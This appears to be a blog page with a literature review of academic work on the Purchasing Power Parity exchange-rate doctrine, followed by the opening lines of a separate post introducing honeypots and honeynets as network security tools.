Thursday, June 6, 2019
Purchasing Power Parity: Does It Exist?
Introduction

The Purchasing Power Parity doctrine is perhaps one of the most controversial financial theories. Over the years, it has had its ebbs and flows, with proponents expositing several mathematical and statistical formulas to support the theory, while critics have severally condemned its utility; according to Belassa1, however, the doctrine has managed to survive nevertheless. Belassa argues that, though in somewhat ambiguous terms, the doctrine had been invoked as early as the Napoleonic wars; its christening and definition came from Prof. Gustav Cassel during the First World War, and it was popularized after the Second World War. The author further posits that interest in the theory tends to be invoked when existing exchange rates are thought to be unrealistic and there is, therefore, a search for what is considered equilibrium rates2. Perhaps one of the controversies that have built up around Purchasing Power Parity starts with the issue of definition. Different authors tend to come up with their own definition (version) of the theory, and as a result, the theory has come to mean different things to different authors3. Before looking at some of the conceptualizations of the theory that have been generated over time, it is pertinent to first examine the theory as it was professed by its author, Prof. Gustav Cassel. Bunting4 presents the first exposition of the theory in Cassel's Money and Foreign Exchange after 1914, which he said was one of the earliest and best accounts of the theory by its author. Bunting explains that the concept of purchasing power parity was born out of the need to establish what exchange rates in Europe should be after the era of the gold standard had passed, that is, when national currencies were on an inconvertible basis.
On this basis, Cassel explains that the primary reason a country's money is in demand in a foreign country is the need to purchase goods produced in that country. Thus, when normal, unrestricted trade between two countries has been established over time, the exchange rate becomes fixed relative to the purchasing power of each currency domestically, and as long as the domestic purchasing power of the currencies does not change, nothing will happen to the exchange rate5. Further, the theory states that when the currencies of these countries undergo inflation, the new normal rate of exchange will be equal to the old rate multiplied by the quotient of the degree of inflation in the one country and in the other6. While this explanation describes the basic framework of the theory, there have been several adjustments and modifications of its meaning and concept as various authors have sought to strengthen or criticize it. Some of these adjustments to the meaning of the theory will suffice to buttress this point. Everett and his colleagues7, attempting to measure currency strengths and weaknesses with the purchasing power parity concept, posited that as long as trade is unrestricted, the exchange rates of currencies tend to obey the purchasing power of the currencies. In this regard, they succinctly take the theory to mean that regardless of how currencies are denominated, when adjusted for units all currencies tend to command the same basket of goods8. This definition is similar to that adopted by Klein et al.9, who likened the purchasing power parity doctrine to the Law of One Price, with the explanation that an identical good (or service) would command the same price, measured in a given numeraire system, all over the trading world10. Belassa, however, gave a more elaborate explanation of the purchasing power doctrine, differentiating between the relative and absolute interpretations of the theory.
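Cassel's inflation-quotient rule can be written as a one-line calculation. The sketch below is an illustration only, not a formula taken from any of the papers reviewed; the function name and the figures are invented, and the rule assumed is simply that the new equilibrium rate equals the old rate multiplied by the ratio of the two countries' price-level changes:

```python
def relative_ppp_rate(old_rate, inflation_home, inflation_foreign):
    """Relative PPP per Cassel's quotient rule.

    old_rate: units of foreign currency per unit of home currency.
    inflation_home / inflation_foreign: price-level ratios (end of
    period divided by start of period) in each country.
    """
    # If the foreign country inflates faster, the home currency
    # buys proportionally more foreign currency.
    return old_rate * inflation_foreign / inflation_home

# Example: 5.0 foreign units per home unit, 5% inflation at home,
# 15.5% abroad -> the parity rate rises to 5.5.
print(relative_ppp_rate(5.0, 1.05, 1.155))
```

The direction of the quotient matters: the currency of the country with the higher inflation depreciates against the other.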
According to him, the absolute version of the purchasing power parity theory argues that when purchasing power parities are calculated as a ratio of consumer goods prices for any pair of countries, the result reflects the equilibrium rates of exchange. On the other hand, the relative version of the theory affirms that, when compared to a period when equilibrium rates prevailed, changes in the relative prices of goods would indicate the necessary adjustments in exchange rates11. In a sense, one can infer from these definitions that the absolute version of the theory seeks to establish equilibrium exchange rates between any pair of countries based on the purchasing power of their currencies, while the relative version intends to measure the over- and undervaluation of currencies at any period in time12. Despite the controversies surrounding the validity and utility of this theory, authors have recently sought to clothe the doctrine in the garments of respectability, and in this regard several statistical materials have been presented that more accurately reflect the relationship between the purchasing power of currencies and exchange rates, as conceived in the theory13. The purpose of this paper is, therefore, to examine some of the literature regarding the theory and perhaps to infer from it the implications and future research possibilities of the theory.

Literature Review

Balassa, Bela (1964). The Purchasing-Power Parity Doctrine: A Reappraisal.

Belassa14 apparently belongs to the group of authors who intend to strengthen the validity and utility of the purchasing power parity doctrine. He begins by first differentiating between the absolute and relative versions of the theory, as explained above.
He, however, asserts that the doctrine as postulated by Cassel tends towards the absolute version when it states that the rate of exchange between two countries will be determined by the quotient between the general levels of prices in the two countries15. Further, he explains that the theory as invoked by another author indicates that the German mark was undervalued against the dollar on some comparisons and overvalued on others, with the Austrian shilling, Danish crown and Dutch guilder all undervalued; extending the theory to the currencies of less developed countries, their currencies appear to be undervalued against the dollar. The author contends that these deviations from the calculated exchange rates were too large to be caused by errors. In a bid to correct the perceived weakness in the theory, Belassa created a new setting for it by introducing non-traded goods (services) into the traditional two-country, two-commodity model. This model of the theory rests on the following assumptions: there is only one limiting factor, labor, and input coefficients are constant. Also, under the assumption of constant marginal rates of transformation, countries with relatively higher productivity levels will experience higher relative prices of non-traded commodities than others. From these propositions, the author posits that income levels play a significant role in the calculation of purchasing powers and that purchasing power parities will be more closely related to exchange rates when prices are expressed in terms of wage units. From this equation, the author posits that if we assume that the production of traded goods relative to non-traded goods constitutes the major difference in international productivity, the currencies of countries with higher productivity will appear to be overvalued in purchasing power parity calculations.
However, if per capita income were used as a proxy for levels of productivity, the ratio of purchasing power parity to the exchange rate will be an increasing function of income levels. In providing empirical confirmation of the proposed relationship between purchasing power parity, exchange rates and income levels, the author argues thus: if differences in tastes do not counterbalance differences in productive endowments, there will be a tendency in each country to consume commodities with lower relative prices in larger quantities16. The result is that the purchasing power of country II's currency will be undervalued if country I's consumption pattern is used as weights, and overestimated if country II's consumption is used. This is shown in the tables below. The second table above shows the comparison of the cost of household services in the United States and Italy for 1950. The author argues that after conversion at exchange rates, domestic services in Italy seem to cost about one-fifth of their United States price, barber and beauty shops one-fourth, and laundry and dry cleaning the same. In the same vein, the purchasing power equivalents for household services were 391 lira at US weights and 165 lira at Italian weights. These figures confirm, the author argues, that services (non-traded goods) cost relatively more in countries with higher income levels. Thus, they buttress the relationship between purchasing power parity, exchange rates and income levels.

Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined.

Bunting18, while conceding that the purchasing power parity doctrine has been severally criticized, adds his own criticism by, according to him, submitting the theory to an improved statistical test.
The basis of the argument set forth in this paper is that though the author of the doctrine of purchasing power parity discussed some likely exceptions to the theory, which could account for the differences observed between actual exchange rates and parity calculated rates, several other exceptions exist that render the theory impracticable. The author proffered an elaborate definition (explanation) of the theory as conceived by Cassel, and of the proposed relationship between the purchasing power of currencies and their exchange rates. Further, he went on to summarize the major exceptions to the general rule into seven main points, as discussed by Cassel in his book Money and Foreign Exchange After 1914. Accordingly, he explained that exchange rates are expected to deviate from the calculated rates if: domestic prices fluctuate in relation to one another, due to any of a series of factors; tariffs and/or shipping costs change in relation to those prevalent in the base year used for the calculation; obstructions to trade other than tariffs and shipping costs become operational during the year under consideration; sudden devaluation of a currency proceeds during the transition period; the activities of speculators affect exchange rates; governments are in need of foreign exchange, for example to pay international debts; or the base year or general price index is not properly selected, since defects in the price index or base year used could cause predictive error in the calculated rates. In sum, Bunting posits that though these exceptions are many and powerful, they do not fully subsume the factors responsible for the differences between actual and calculated rates. In this regard, the author asserts that the critique of the theory can be simplified by considering problems of price levels and direction of change.
On the issue of price levels, he argues that problems with the choice of base year, and with the commodities that should make up the price indices used in the calculation, reveal ambiguity in the theory. First, on base year determination, the author argues that Cassel's contention that "it is only if we know the exchange rate which represents a certain equilibrium that we can calculate the rate which represents the same equilibrium at an altered value of the monetary units of the two countries"19, i.e. that we can only calculate the equilibrium rate now if we know the rate in a particular base year, is faulty because no such equilibrium persists in international trade. He argues that because international economic conditions do not persist for long, a given base year can only reasonably be used to measure relative price changes for a short period of time. On the commodity prices to be included in the price index, Bunting likewise faults Cassel's insistence that a general price index should be used, arguing that not all goods are traded internationally; changes in the prices of commodities not traded internationally can, therefore, have no effect on a foreign country's valuation of a country's currency. Further, on the direction of change, the author argues that Cassel's contention that "when currencies are not on a convertible specie standard it is parities which determine exchange rates"20 tends to overlook the possibility that the direction of change could be the reverse, i.e. price levels may be caused by changes in exchange rates. Thus, while Cassel concedes that the actions of speculators could cause changes in exchange rates without corresponding price changes, there are several other factors capable of inducing changes in exchange rates.
Bunting mentions the following factors: government monetary policies (alterations of central bank rates, stabilization funds, international government loans); private international loans; and special considerations such as large corporations transferring their capital holdings from one country to another to protect their profits, or tourist expenditures and immigration remittances, both of which involve the purchase of foreign currencies with no regard for the purchasing power of the currencies involved. Subjecting the purchasing power parity theory to statistical tests, the author presents his results in the graphical form shown below. In the charts below, Franco-American exchange rates were compared for the 1920s and 1930s. The solid line represents calculated rates, while the broken line labeled "no lag" represents actual rates. The differences exhibited between the actual and calculated rates in the statistical test constitute the discrepancy in the theory. The 1-month, 2-month and 3-month lag periods were allowed on the assumption that time must pass before changes in purchasing power parities effect a change in exchange rates; the 1-3 month lags should therefore show more correlation with the actual rates. However, this was not the case. The author concludes that proponents of the theory should simply recognize that the theory as it stands is defective and needs to be revised.

Davutyan, Nurhan and John Pippenger (1985). Purchasing Power Parity Did Not Collapse During the 1970s.

The authors of this paper proffered answers to criticisms of the validity and utility of the purchasing power parity theory, especially the claims by some other authors that though the theory worked relatively well in the 1920s, it failed in the 1970s. Davutyan and John21 contend that a possible reason for the apparent failure of the purchasing power theory to predict exchange rates accurately when figures from the 1970s are used could be that, relative to the 1920s, monetary policies were more coordinated in the 1970s.
They therefore assert that it is the coordination of monetary policies, not the failure of the purchasing power parity theory, that causes conventional statistical tests to reject the validity of purchasing power parity for the 1970s. Providing evidence to support their claims, the authors posit that if we assume there are no obstructions to trade, i.e. that all goods are tradable and arbitrage is effective, the result refers to the relative version of the purchasing power theory, as explained by Bellassa22 above. In consolidating their argument, the authors contend that purchasing power parity tends to fail in two instances: when arbitragers fail to respond to profitable opportunities, or when transaction costs and other impediments inhibit trade. They contend, however, that the first factor is unlikely, so the latter appears to be more important. Elucidating on the second factor, Davutyan and John posit that under the assumption of zero transaction costs all goods are tradable; when this assumption is relaxed, goods can be divided into two categories, tradables with zero transaction costs and non-tradables with high transaction costs. Thus, in the absence of transaction costs, arbitrage keeps the relative prices of tradable goods across countries equal, but this is not the case between non-tradables, nor between tradables and non-tradables. Therefore, when there are economic shocks, the equation above holds for tradables but not for non-tradables. Furthermore, the authors contend that even with tradables, while the zero transaction cost assumption is convenient in theory, it does not always hold in reality. Relative transaction costs differ between countries, and this, too, tends to introduce errors into the purchasing power parity calculation, as with the non-tradables.
Another source of error in purchasing power calculations, according to the authors, is the use of unequal weights. They argue that in the second equation above, the weights in the price index are assumed to be the same for both countries; using CPIs, wholesale price indices or GNP deflators, however, would violate the requirement of similar weights and could introduce error into the measurement. To support their claims, the authors present the data in the table below, where the R2 values and the estimates of the regression coefficients support the argument that purchasing power parity works.

Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses: An Operational Model for Calculating Parity Exchange Rates.

Everett24 and his colleagues presented a practical, working model of the purchasing power parity theory and argued that by using this model to calculate exchange rates, currency strengths and weaknesses can be measured. Defining purchasing power parity, the authors contend that the primary concept of the theory is that when the forces of the price mechanism are unrestricted, exchange rates tend to conform to the purchasing power of currencies. Thus, instead of price levels adjusting to exchange rates, the reverse is the case. In this regard, the authors assert that while this general approximation of the theory applies to a world of freely floating exchange rates, their model can be adapted to a variety of exchange rate regimes, such as managed floats, crawling pegs and fixed exchange rates. In explaining this model, the authors refer to what they call the parity chart. As shown below, the chart is derived thus: the horizontal axis measures time from a chosen origin, the base year, while the vertical axis measures two things: one, the percentage difference in the purchasing power of the currencies, and two, the percentage change in the actual exchange rate from the base year. While the dotted line represents the actual (observed) exchange rates, the solid line represents the parity (calculated) exchange rates over time.
Using the two-country model to explain the parity chart, the authors explain that if we assume there are no restrictions to trade and a perfect base time, then, under this scenario, if the change in the purchasing power of country A's currency differs from that of country B's, the parity line in the chart above will have a positive or negative slope, depending on the sign of the difference between the purchasing powers of the currencies under consideration. Further, if actual exchange rates were plotted on the same chart, their slope should conform closely to that of the parity line. What can be inferred from this explanation is that the parity line in the chart closely reflects the expected change in exchange rates that should follow changes in the purchasing power of the countries' currencies. To support their claim that the parity chart can be used to measure changes in exchange rates under any type of exchange rate regime, the authors presented empirical results for several currencies with different exchange rate regimes: the German mark (a more or less freely floating exchange rate), the Spanish peseta (a strictly managed exchange rate), the Colombian peso (a crawling peg currency) and the South African rand (a fixed exchange rate)25. The results for the German mark are presented below. The authors explain that the vertical axis measures the percentage deviation from the calculated rate. While the line representing the inflation factor shows a fairly steady rise, in line with the well-known fact of relatively lower rates of increase in the West German price level compared with most other countries, the line representing the exchange rate shows no apparent trend, reflecting the fact that the exchange rates of West Germany's trading partners vis-à-vis the dollar on a trade-weighted basis may have moved in opposite directions. These two factors, when compounded, yield the parity line.
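The construction of the parity line can be sketched numerically. The code below is an illustration under the assumption, taken from the description of the chart, that the parity line tracks the cumulative percentage difference between the two countries' price-level changes since the base year; the function name and the index values are invented:

```python
def parity_line(price_index_a, price_index_b):
    """Percentage change in parity since the base year (index 0).

    Positive values mean country B's price level has risen faster
    than country A's, so A's currency should appreciate to hold
    parity; this gives the chart's solid line its slope.
    """
    base_a, base_b = price_index_a[0], price_index_b[0]
    return [
        ((pb / base_b) / (pa / base_a) - 1.0) * 100.0
        for pa, pb in zip(price_index_a, price_index_b)
    ]

# Hypothetical indices: B inflates faster than A, so the parity
# line slopes upward, as the authors describe.
print(parity_line([100, 102, 104, 106], [100, 105, 110, 116]))
```

Plotting this series against the observed percentage change in the actual exchange rate from the same base year would reproduce the two lines of the parity chart.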
After presenting empirical results for all four representative countries listed above, the authors concluded that an in-depth examination of the parity chart and line indicates that the parity line supports an effective and informed judgment about future currency movements. Further, if the parity rate diverges from the actual rate, this indicates that the currency is presently either over- or undervalued and will therefore have to adjust; the longer such a divergence persists, the more likely it is that an adjustment will occur soon26.

Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in Medium Term Simulation of the World Economy.

This is another study that attempted to strengthen the validity and utility of the purchasing power parity doctrine. The authors posited that purchasing power parity could be used to derive a more effective simulation or projection of the world economy. Admitting that the theory has come to mean different things to different writers, the authors adopted the law-of-one-price definition of the theory, which explains that an identical good or service would command the same price, measured in a given numeraire system, all over the trading world27. The authors further state that though there are several controversial issues about the theory, such as what category of goods should be included in the calculation or what time should serve as the origin or base of the calculation, they assert that any detailed exchange rate modeling system should obey the purchasing power parity rule in the long run. Statistically estimating the movement of exchange rates in relation to the purchasing power parity principle for the 1970s, the authors presented a formula which, according to them, states that export prices, in U.S. dollar terms, should have a common rate of change across all countries, namely, the U.S. rate of change of export prices28.
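A test of this kind can be illustrated with ordinary least squares. The regression form in the sketch below is my assumption (exchange-rate changes regressed on the two countries' price changes), not necessarily the authors' exact specification, and the data are synthetic; only the hypothesized coefficient values a = 0, b = -1.0 and c = +1.0 are taken from the text:

```python
import numpy as np

# Hypothetical data generated to be consistent with PPP: the
# exchange-rate change moves one-for-one with the price differential.
rng = np.random.default_rng(1)
dp_own = rng.normal(0.02, 0.01, size=200)  # own-country price change
dp_us = rng.normal(0.01, 0.01, size=200)   # U.S. price change
de = -1.0 * dp_own + 1.0 * dp_us + rng.normal(0.0, 0.001, size=200)

# OLS estimates of a, b, c in:  de = a + b*dp_own + c*dp_us + e
X = np.column_stack([np.ones_like(de), dp_own, dp_us])
(a_hat, b_hat, c_hat), *_ = np.linalg.lstsq(X, de, rcond=None)
print(round(a_hat, 3), round(b_hat, 2), round(c_hat, 2))
```

When the data really do obey PPP, the estimates land near the hypothesized values of 0, -1 and +1; large, significant departures from those values are what a conventional test would count as a rejection.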
Thus, if exchange rates during this period had moved in accordance with the principle of purchasing power parity, the regression estimates would be consistent with the hypothesis of purchasing power parity, where a = 0, b = -1.0, c = +1.0, and e_it is an additive random error. Scatter diagrams of the data points for the two equations above are shown below. Conclusively, the authors assert that, judging by these statistics, all the regression estimates in the charts above passed significance tests. It could thus be deduced that the relationship between the purchasing power of currencies and the actual exchange rates was tightest for members of the EMS, and slightly less tight when the UK is included. Based on this evidence, the authors believe that their contention that, on average, purchasing power parity movements approximately reflect actual exchange rates in the 1970s has been adequately justified, and as a result, it could be generalized that calculations of purchasing power parity could be used in predicting movements of exchange rates.

John, Pippenger (1982). Purchasing Power Parity: An Analysis of Predictive Error.

John29 proffered answers to criticisms concerning the predictive errors observed in exchange rates calculated from purchasing power parity. He observed that studies carried out by several authors indicate that, for several countries, the predictive error of purchasing power parity during the 1970s followed what they referred to as a random walk, i.e. whatever the deviation between the parity rate and the actual rate observed this month, next month it is as likely to increase as to decrease. In this regard, the author argued that the basic idea behind the purchasing power parity doctrine is that in the long run, the differences between the parity rates and the actual exchange rates tend to disappear and the two rates are equated.
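The distinction at stake here can be illustrated with a toy simulation. The AR(1) setup below is my own illustration, not the author's test: a deviation with rho = 1 behaves as a random walk, while rho < 1 gives the gradual decay toward parity that the PPP argument predicts:

```python
import numpy as np

def simulate_deviation(rho, n=600, shock_scale=1.0, seed=2):
    """AR(1) deviation e_t = rho * e_{t-1} + shock.

    rho = 1.0 reproduces a random walk; rho < 1.0 mean-reverts,
    pulling the deviation back toward zero in the long run.
    """
    rng = np.random.default_rng(seed)
    e = np.empty(n)
    e[0] = 10.0  # start with a large initial deviation from parity
    for t in range(1, n):
        e[t] = rho * e[t - 1] + rng.normal(scale=shock_scale)
    return e

# With the shocks switched off, the contrast is stark: the random
# walk keeps its initial deviation forever, while the mean-reverting
# error decays toward zero.
walk = simulate_deviation(1.0, shock_scale=0.0)
revert = simulate_deviation(0.9, shock_scale=0.0)
print(walk[-1], revert[-1])
```

Under the random-walk hypothesis the best forecast of next month's deviation is this month's deviation; under mean reversion the forecast shrinks toward zero, which is the behavior the author argues PPP errors should exhibit.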
They argue that though economic shocks, in whatever guise, could in the short term drive the actual rate away from the parity rate, in the absence of new shocks the price mechanism tends to equate the two rates in the long run. Based on this argument, the author contends that predictive errors for purchasing power parity should not follow a random walk; instead there should be a gradual decline or rise towards the actual rate. Supporting the claim that predictive errors in purchasing power parity do not follow a random walk in the long run, the author presented the results of empirical studies of several countries using several decades of data.

Yeager, B. Leland (1958). A Rehabilitation of Purchasing-Power Parity.

Following the same path as the papers reviewed above, Yeager30 also sought to strengthen the validity and utility of the purchasing power parity theory. He starts his argument with the basic assumption that people primarily value currencies for what can be bought with them; on this assumption, he argues, it is safe to presume that in an unrestricted market people will tend to exchange currencies according to their relative purchasing powers. The author admits that the theory in its basic form, as stated above, is loose and ambiguous; he posits, however, that the theory performs two main functions. First, the theory gives an expression of what the equilibrium exchange rates for currencies should be, however crude this rate appears. Second, the theory acts as a stabilizing force for exchange rates. Explaining this second function, he asserts that when, for any reason, actual exchange rates deviate from the equilibrium rates, the theory describes pressures at work tending to check and reverse these random departures from the range of equilibrium rates.
The author provides this example to buttress the point made above about the stabilizing powers of the parity theory: let us suppose, for example, that prevailing exchange rates unmistakably undervalue the British pound in relation to the purchasing powers of the pound and of foreign currencies. Foreigners, say Americans, will offer dollars for pounds to buy British goods at bargain prices. Britons will offer relatively few pounds for dollars to buy American goods at their apparently high prices. Unmatched attempts to sell dollars and buy pounds will bid the exchange rate toward the equilibrium level. In the same light, the author evaluates some of the numerous objections raised against the theory and posits that most of these objections largely ignore the stabilizing-pressures aspect of the theory. In sum, the author concludes that most of the discrepancies observed in purchasing power parity rates are attributable to inappropriate base periods; disequilibrium exchange rates (including base-period rates), often imposed by official pegging; and tariffs, quotas, and other interferences with trade, payments, and exchange rates31. Wyman32 extends the utility of the purchasing power parity doctrine further by applying it to the calculation of gains or losses incurred by holding foreign items, such as foreign currencies or goods.
Relating purchasing power parity to currency changes, the author explains that purchasing power is related to the exchange rates of currencies in that differential rates of inflation between, say, the United States and a foreign country influence the exchange rate between the monetary units of the two countries. Putting this definition into an equation, he illustrates the calculation of the purchasing power parity rate thus: suppose the exchange rate between the United States and a foreign country is 20FC = $1, where FC denotes a unit of foreign currency, and suppose that during the year the US price-level index changed from 100 to 110 while that of the foreign country changed from 100 to 120. The purchasing power parity rate can then be calculated by determining an adjustment factor to be applied to the exchange rate. The adjustment factor for period t is the foreign price-level ratio divided by the US price-level ratio, where each price-level ratio is defined as the general price-level index at the end of period t divided by the general price-level index at the beginning of period t; here, that is (120/100) / (110/100) = 1.0909. Explaining this formula, the author asserts that when the adjustment factor is applied to the exchange rate in the example above, the result is FC 20 x 1.0909 = FC 21.8182 = $1. So, if the actual exchange rate at the end of period t stands at the calculated rate of FC 21.8182 to $1, investors in either country will maintain their purchasing power relative to each other; if, however, the exchange rate were FC 22 to $1, the FC would have depreciated more than is necessary to maintain purchasing power parity, and US investors in need of the foreign currency would have exchanged the currency at a loss.
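Wyman's worked example translates directly into code. The short sketch below reproduces the figures from the passage (20FC = $1, US index 100 to 110, foreign index 100 to 120); the function name is my own:

```python
def ppp_adjusted_rate(fc_per_dollar, us_start, us_end, fc_start, fc_end):
    """Apply Wyman's adjustment factor: the foreign price-level ratio
    divided by the US price-level ratio, scaled onto the old rate."""
    adjustment = (fc_end / fc_start) / (us_end / us_start)
    return fc_per_dollar * adjustment

rate = ppp_adjusted_rate(20, 100, 110, 100, 120)
print(round(rate, 4))  # 21.8182, the parity rate from the passage
```

Comparing the actual end-of-period rate against this parity rate (FC 22 versus FC 21.8182 in the example) is what signals a purchasing-power gain or loss on foreign holdings.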
The author went on to establish a multi-equation system that can be employed in analyzing potential gains and losses in foreign exchange, based on the purchasing power parity concept.

Ruble, L. William (1961). A Comparison of the Parity Ratio with Agricultural Net Income Measures 1910-1958. Journal of Farm Economics, 43(1):101-112. And Stine, O. C. (1946). Parity Prices. Journal of Farm Economics, 28(1):301-305.

These two works covered a slightly different aspect of purchasing power parity. They focused on the purchasing power of farmers, comparing price changes in farm and non-farm products, and thus what farmers are paid for their farm products against what they have to pay for non-farm products. Stine33 explains that in the years after the First World War, when the purchasing power parity concept was born and first applied as a measurement of changes in purchasing power, marked changes in general price levels were observed, as expected; however, it was also observed that the prices of farm products declined more rapidly and farther than those of non-farm products. As a result, what farmers had to pay for the products they bought differed considerably from what they earned from the sales of farm products. Ruble34, supporting this line of argument, argues that since the prices received by farmers and the prices paid by farmers affect the livelihood and wellbeing of the farming family, the parity ratio provides a good indicator of the standard of living of farmers.
Further, he contends that the level of the parity ratio is expected to give a good indication of the following measures of the standard of living of farmers: net money income per capita, per farm, or per worker; net real income per capita, per farm, or per worker; and the income of farmers compared to the income of non-farmers on a per capita or per worker basis (the parity income concept). However, the data and results of the empirical studies presented to measure the relation between the parity ratio and the wellbeing of farmers suggest that the parity ratio might not properly reflect the general wellbeing of farmers, if the wellbeing of farmers in general is expressed by per capita, per farm, or per worker net income, real or money. In arriving at the figures in the table, the parity ratio was correlated separately with the per capita net agricultural income of the farm population, the net income of farm operators from farming per farm, and the net income of farm workers from farming per worker, income from all sources, deflated by the index of prices paid by farmers for family-living items (1917-19 = 100).

Summary

There is no denying that the Purchasing Power Parity doctrine is an important theory in the financial world. It is true that a lot of controversy has been generated about its validity and utility, but it is also true that several authors have been able to demonstrate its validity and, more importantly, its utility in an array of fields. Just as the theory has come to mean different things to different authors, it has also carved out for itself different functions, depending on the perspective one adopts. It is not surprising, therefore, that authors have been able to apply the doctrine to a number of endeavors, as seen in the reviews above. In its most basic form, the concept argues that people primarily need the currencies of other countries for the purpose of buying the goods and commodities of those countries.
Therefore, people will only be prepared to exchange currencies at their relative worth. Here lies the relationship between purchasing power parity and the exchange rates of currencies, i.e. when it is suspected that a currency is under- or over-valued, market forces will tend to force the rate back to the equilibrium level. Parity here describes the rate achieved after trades have occurred between two countries, uninterrupted, for a certain period of time, and a common exchange rate has been established as a result. From this very basic understanding of the theory, as proposed by its author Prof. Gustav Cassel, several modifications, adjustments, and extensions of the theory have been proposed and proved. For example, Balassa fine-tuned the predictive value of the theory by modifying the basic two-country, two-commodity model to include considerations for non-traded goods (services) and the per capita income of each country, which, he argues, play a crucial role in the purchasing power of currencies. Klein and his colleagues modified the theory and employed it in simulating/projecting changes in the world economy; Everett and others also modified the theory and proved it to be useful in appraising the strengths and weaknesses of countries' currencies; while John showed that the predictive errors in rates calculated with the purchasing power parity concept could be a result of faults inherent in the calculation methods and data. From the foregoing, one can only infer that purchasing power parity is still an important financial concept, although further academic and research efforts should be geared towards resolving some of the objections raised against the theory. It is obvious that criticism of the theory will further help to strengthen it in the future, as we have seen done in the past. Most of the objections raised have been somehow addressed, even if not completely resolved.
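The relative version of the doctrine described above can be illustrated with a short numerical sketch. All figures here are hypothetical, chosen only to show the mechanics: if domestic prices rise faster than foreign prices, the theory predicts a proportional depreciation of the domestic currency.

```python
# Illustrative sketch of relative purchasing power parity (PPP).
# All numbers are hypothetical, for demonstration only.

def relative_ppp_rate(base_rate, domestic_inflation, foreign_inflation):
    """Predicted exchange rate (domestic units per foreign unit) after one period."""
    return base_rate * (1 + domestic_inflation) / (1 + foreign_inflation)

# Base year: 1.50 units of domestic currency per unit of foreign currency.
# Domestic inflation 10%, foreign inflation 2%.
predicted = relative_ppp_rate(1.50, 0.10, 0.02)
print(round(predicted, 4))  # 1.6176 -- the domestic currency is predicted to depreciate
```

The point of the sketch is only the direction and proportionality of the adjustment; real PPP tests, as the reviewed authors note, must contend with non-traded goods, measurement error, and data problems.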
One can thus conveniently conclude that, with time, the theory might be better fine-tuned and become more effective at explaining and predicting exchange rates of currencies.

Endnotes
Balassa, Bela (1964). The Purchasing-Power Parity Doctrine: A Reappraisal.
Ibid. p.584
Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in Medium Term Simulation of the World Economy.
Balassa, Bela (1964).
Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined.
Bunting (1939) provided almost a word-for-word definition and explanation of the theory as postulated by Cassel. The author gives a better idea of the original theory.
Ibid. p.283
Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses: An Operational Model for Calculating Parity Exchange Rates.
Ibid. p.80
Klein et al., 1981.
Ibid. p.486
Balassa, 1964 pp.584-585.
This is a personal opinion based on the definitions of absolute and relative PPP proffered by Balassa, 1964.
Ibid.
Ibid.
Balassa, 1964 p.585, quoting Cassel in his book Money and Foreign Exchange After 1914.
Ibid.
Ibid. p.587
Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined.
Bunting, 1939 p.285, quoting Cassel in his book Money and Foreign Exchange After 1914.
Bunting, 1939 p.288
Davutyan, Nurhan and John Pippenger (1985). Purchasing Power Parity Did Not Collapse During the 1970s.
Balassa, 1964.
Davutyan and Pippenger, 1985 p.1151
Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses: An Operational Model for Calculating Parity Exchange Rates.
Ibid. p.84
Ibid. p.90
Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in Medium Term Simulation of the World Economy. p.486
Ibid. p.487
John, Pippenger (1982). Purchasing Power Parity: An Analysis of Predictive Error.
Yeager, B. Leland (1958). A Rehabilitation of Purchasing-Power Parity.
Ibid. p.529
Wyman, E. Harold (1976).
Analysis of Gains or Losses from Foreign Monetary Items: An Application of Purchasing Power Parity Concepts.
Stine, O. C. (1946). Parity Prices.
Ruble, L. William (1961). A Comparison of the Parity Ratio with Agricultural Net Income Measures.

Bibliography
Balassa, Bela (1964). The Purchasing-Power Parity Doctrine: A Reappraisal. The Journal of Political Economy, Vol. 72(6), pp. 584-596.
Bunting, H. Frederick (1939). The Purchasing Power Parity Theory Reexamined. Southern Economic Journal, Vol. 5(3), pp. 282-301.
Davutyan, Nurhan and John Pippenger (1985). Purchasing Power Parity Did Not Collapse During the 1970s. The American Economic Review, Vol. 75(5), pp. 1151-1158.
Everett, M. Robert, Abraham M. George and Aryeh Blumberg (1980). Appraising Currency Strengths and Weaknesses: An Operational Model for Calculating Parity Exchange Rates. Journal of International Business Studies, Vol. 11(2), pp. 80-91.
John, Pippenger (1982). Purchasing Power Parity: An Analysis of Predictive Error. The Canadian Journal of Economics, Vol. 15(2), pp. 335-346.
Klein, R. Lawrence, Shahrokh Fardoust and Victor Filatov (1981). Purchasing Power Parity in Medium Term Simulation of the World Economy. The Scandinavian Journal of Economics, Vol. 83(4), pp. 479-496.
Ruble, L. William (1961). A Comparison of the Parity Ratio with Agricultural Net Income Measures 1910-1958. Journal of Farm Economics, Vol. 43(1), pp. 101-112.
Stine, O. C. (1946). Parity Prices. Journal of Farm Economics, Vol. 28(1), pp. 301-305.
Wyman, E. Harold (1976). Analysis of Gains or Losses from Foreign Monetary Items: An Application of Purchasing Power Parity Concepts. The Accounting Review, Vol. 51(3), pp. 545-558.
Yeager, B. Leland (1958). A Rehabilitation of Purchasing-Power Parity. The Journal of Political Economy, Vol. 66(6), pp. 516-530.
Wednesday, June 5, 2019
Analysis of Honeynets and Honeypots for Security
Chapter 1: Introduction

A honeynet is a kind of network security tool. Most of the network security tools we have are passive in nature, for instance firewalls and IDS. They have a database of available rules and signatures, and they operate on these rules; that is why anomaly detection is limited to the set of available rules, and any activity that is not in alignment with the given rules and signatures goes under the radar undetected. A honeypot, by design, allows you to take the initiative and trap those bad guys (hackers). This system has no production value and no authorized activity; any interaction with the honeypot is considered malicious in intent. A combination of honeypots is a honeynet. Basically, honeypots and honeynets do not solve the security problem, but they offer information and knowledge that help the system administrator to enhance the overall security of his network and systems. This knowledge can act as an intrusion detection system and be used as input for early warning systems. Over the years, researchers have successfully isolated and identified a variety of worms and exploits using honeypots and honeynets.

Honeynets extend the concept of a single honeypot to a highly controlled network of honeypots. A honeynet is a specialized network architecture configured in a way to achieve Data Control, Data Capture and Data Collection. This architecture builds a controlled network in which one can control and monitor all kinds of system and network activity.

1.1 Information Security

